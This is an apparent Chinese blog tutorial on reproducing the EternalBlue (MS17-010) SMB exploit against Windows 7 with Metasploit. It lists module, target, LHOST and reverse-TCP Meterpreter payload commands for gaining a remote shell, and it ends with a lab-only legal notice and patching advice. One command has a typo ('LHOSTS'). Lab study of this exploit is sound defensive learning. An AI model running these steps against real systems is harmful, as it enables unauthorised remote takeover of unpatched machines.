永恒之蓝漏洞利用复现

准备阶段:
1.系统:kali,win7
2.使用工具:metasploit,msfconsole
3.知道攻击机(一般是kali)和目标机(win7)的ip地址

操作:
1.打开kali终端,切换到root权限
2.初始化metasploit,输入 msfdb init
3.启动msfconsole

msf使用法则:
使用模块 -> 配置模块必选项 -> 运行模块

metasploit攻击永恒之蓝全流程:
开始之前一般会先ping一下目标机,如果连不上请把目标机的防火墙关了。
1.查找永恒之蓝模块 search ms17_010
2.使用模块 use exploit/windows/smb/ms17_010_eternalblue
3.查看必选项 show options
4.设置必选项 set RHOSTS 目标机ip
set LHOSTS 攻击机ip
5.run

完成攻击后,会进入meterpreter命令行,输入shell,就进入了目标机的命令界面,可以想干嘛就干嘛了。

永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞利用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梦 & 醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值